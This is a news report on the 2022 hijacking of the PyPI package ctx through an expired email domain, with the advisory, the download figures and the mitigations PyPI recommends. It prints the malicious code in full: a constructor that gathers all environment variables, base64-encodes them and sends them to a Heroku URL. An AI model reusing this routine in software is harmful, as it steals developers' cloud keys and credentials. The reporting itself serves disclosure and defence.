Updated The Python Package Index (PyPI), a repository for Python software libraries, informed Python developers that the
ctx the package has been compromised.
Any installation of the software within the last ten days should be investigated to determine if sensitive account credentials stored in environment variables, such as cloud access keys, have been stolen.
PyPI administrators estimate that around 27,000 malicious copies of ctx have been downloaded from the registry from malicious versions of
ctx first appeared, beginning around 7:18 p.m. UTC on May 14, 2022.
They add that a safe version of
ctx (1.2) is a dependency of another package, the Context Engine. But newer malicious versions of
ctx do not appear as dependencies in other packages scanned by
ctx The project hosted on PyPI was taken over via user account compromise and replaced with a malicious project containing runtime code that harvested content from
os.environ.items() when instantiating Ctx objects,” PyPI administrators explain in a security advisory released on Tuesday. “The captured environment variables were sent as a base64-encoded query parameter to a Heroku application running on
This URL is currently not configured to respond to web requests over HTTP – the application has likely been disabled or removed.
About half of the Python libraries in PyPI may have security issues, according to boffins
In a blog post on Tuesday, Yee Ching Tok, head of the Internet Storm Center, observes that another (more accessible) project on GitHub –
github.com/hautelook/phpass – contained the same malicious Heroku domain in its PHP code.
ctx package, now removed from PyPI, is a Python library for accessing Python dictionaries using dot notation. It remained unchanged for the past eight years (as it remains on GitHub) until May 14, 2022. That’s when the email domain expired (
A Reddit post from three days ago that announced the arrival of the new version of
ctx may come from someone involved in the subversion of the package. At least that’s the speculation of those who replied to the now-deleted initial post. The register emailed the person in question – whose GitHub account includes security and hacking tools – to ask about it, but we haven’t heard back.
The exfiltration code is not sophisticated, which could indicate that the attack is more exploratory than malicious. It browses environment variables stored on the victim’s machine, encodes them in base64 and appends them to a Heroku application URL as query parameters.
class Ctx(dict): def __init__(self): self.sendRequest() def sendRequest(self): string = "" for _, value in os.environ.items(): string += value+" " message_bytes = string.encode('ascii') base64_bytes = base64.b64encode(message_bytes) base64_message = base64_bytes.decode('ascii') response = requests.get("hxxps://anti-theft-web.herokuapp.com/hacked/"+base64_message)
A post Monday by another Reddit user seems to be among the first to sound the alarm.
Those who oversee PyPI say that domain takeovers are a known attack vector and that defending PyPI against it involves disabling “verified” email status – necessary to process a password update. password – if a PyPI email to the account bounces. But triggering deverification requires PyPI to send an email request to the expired domain between the time of expiration and domain takeover. And that doesn’t seem to have happened.
Pythonistas note that they could perform this kind of analysis on an ongoing basis and freeze accounts associated with expired or near-expired domains, but this would come “at the cost of an increased support load for the moderator team. and PyPI administrators”.
PyPI admins recommend enabling multi-factor authentication for PyPI accounts and using version pinning and hash checking mode for greater security. ®
Updated to add
The person who modified the content of
ctx spoke out, saying that they had not only tampered with the Python library, but also
PHPass. Netizen said he got 1,000 environment variables from vandalized dependencies, but insisted there was no malicious intent and was an attempt to demonstrate insecurities with third-party packages.
“ALL DATA I HAVE RECEIVED IS DELETED AND NOT USED,” they added.